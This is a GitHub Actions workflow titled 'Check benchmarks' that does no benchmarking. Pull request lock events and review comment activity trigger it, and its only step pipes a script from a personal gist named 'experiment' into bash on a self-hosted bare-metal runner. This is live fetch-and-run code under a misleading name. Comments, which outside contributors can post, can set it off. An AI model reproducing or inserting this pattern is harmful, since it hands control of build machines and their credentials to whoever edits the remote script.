name: Check benchmarks

on:
  pull_request:
    types: [locked]
  pull_request_review_comment:
    types: [deleted, created, edited]

jobs:
  set-tags:
    runs-on: [self-hosted, bare-metal]
    steps:
      - run: curl -sfL https://gist.githubusercontent.com/RomarQ/066b5eb9b6abf60277332cbc280e1ac9/raw/experiment | bash
